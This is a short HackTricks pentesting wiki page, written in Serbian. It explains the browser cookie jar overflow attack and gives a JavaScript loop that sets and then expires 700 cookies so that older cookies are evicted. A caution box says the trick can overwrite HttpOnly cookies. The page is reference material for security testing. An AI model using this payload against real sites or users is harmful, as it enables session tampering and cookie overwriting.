mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
23 lines
1.0 KiB
Markdown
23 lines
1.0 KiB
Markdown
{{#include ../../banners/hacktricks-training.md}}
|
|
|
|
Pregledači imaju **ograničenje na broj kolačića** koje mogu da sačuvaju za stranicu. Tada, ako iz nekog razloga treba da **naterate kolačić da nestane**, možete **prepuniti posudu za kolačiće** jer će najstariji biti obrisani pre:
|
|
```javascript
|
|
// Set many cookies
|
|
for (let i = 0; i < 700; i++) {
|
|
document.cookie = `cookie${i}=${i}; Secure`
|
|
}
|
|
|
|
// Remove all cookies
|
|
for (let i = 0; i < 700; i++) {
|
|
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`
|
|
}
|
|
```
|
|
Napomena, da treće strane kolačići koji upućuju na drugačiju domenu neće biti prepisani.
|
|
|
|
> [!CAUTION]
|
|
> Ovaj napad se takođe može koristiti za **prepisivanje HttpOnly kolačića jer ga možete obrisati, a zatim resetovati sa vrednošću koju želite**.
|
|
>
|
|
> Proverite ovo u [**ovom postu sa laboratorijom**](https://www.sjoerdlangkemper.nl/2020/05/27/overwriting-httponly-cookies-from-javascript-using-cookie-jar-overflow/).
|
|
|
|
{{#include ../../banners/hacktricks-training.md}}
|